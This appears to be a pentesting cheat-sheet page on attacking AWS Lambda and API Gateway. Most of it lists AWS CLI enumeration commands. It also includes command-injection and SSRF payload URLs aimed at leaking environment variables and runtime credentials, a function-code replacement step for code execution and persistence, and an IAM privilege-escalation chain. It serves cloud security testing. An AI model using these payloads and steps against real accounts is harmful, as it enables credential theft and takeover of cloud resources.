Lambda Functions

Lambda Function exploits

AWS Lambda is a compute service used to run code in response to events, and manage compute resources automatically. Lambda is serverless

Enumeration

List of all lambda functions

aws lambda list-functions

Retrieve the information about the specified lambda function

aws lambda get-function --function-name [function-name]

Retrieve the policy information about the specified lambda function

aws lambda get-policy --function-name [function-name]

Retrieve the event source mapping information about the specified lambda function

aws lambda list-event-source-mappings --function-name [function-name]

List of all the layers (dependencies) in aws account

aws lambda list-layers

Retrieve the full information about the specified layer name

aws lambda get-layer-version --layer-name [layername] --version-number [version-number]

REST API Gateway

List of all the REST APIs

aws apigateway get-rest-apis

Get the information about specified API

aws apigateway get-rest-api --rest-api-id [api-id]

Get stages

aws apigateway get-stages --rest-api-id <rest-api-id> --profile <profile> --region <region>

List information about a collection of resources

aws apigateway get-resources --rest-api-id [api-id]

Get information about the specified resource

aws apigateway get-resource --rest-api-id [api-id] --resource-id [resource-id]

Get the method information for the specified resource

aws apigateway get-method --rest-api-id [api-id] --resource-id [resource-id] --http-methode [method]

List of all stages for a REST API

aws apigateway get-stages --rest-api-id [api-id]

Get the information about specified API's stage

aws apigateway get-api-keys --include-values

Get the information about a specified API key

aws apigateway get-api-key --api-key [api-key]

Call a REST API

curl -X GET 'https://<rest-api>.execute-api.<region>.amazonaws.com/<stage-name>/<api-endpoint>' -H 'x-api-key: <api-key>' | jq

Credential Access

RCE

Lambda function vulnerable to command injection

Command Injection

https://vulnerable.lambda.amazonaws.com/prod/system?cmd=id
https://vulnerable.lambda.amazonaws.com/prod/system?cmd=env

SSRF

https://vulnerable.lambda.amazonaws.com/prod/vuln?url=http://localhost:9001/2025-05-15/runtime/invocation/next
https://vulnerable.lambda.amazonaws.com/prod/vuln?url=file://proc/self/environ

Using CLI

Environment variable:

aws lambda get-function --function-name [function-name]

One misconfiguration organizations often make with Lambda is including sensitive information in the environmental variables of the function

aws lambda list-functions --profile [profile]

Execute a lambda function

$ aws lambda invoke --function-name  [FunctionName-Parameter] --payload '{}' output.txt --profile admin

Exploitation - update-function-code

zip <file name>.zip <file name>.py

aws lambda update-function-code --function-name <function name> --zip-file fileb://<zip file>.zip

aws lambda invoke --function-name <function name> output.json

cat output.json

Persistence

lambda:UpdateFunctionCode

IAM

PrivEsc

iam:PassRole + lambda:CreateFunction + lambda:InvokeFunction

IAM

Interesting Book

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Advanced Penetration Testing: Hacking AWS 2 This book delves deeper into analyzing the security of various AWS services and shows techniques and tactics used by an attacker to breach an AWS environment
Hands-On AWS Penetration Testing with Kali Linux Set up a virtual lab and pentest major AWS services, including EC2, S3, Lambda, and Cloud

PreviousEC2 - Elastic Compute Cloud NextContainers

Last updated 1 month ago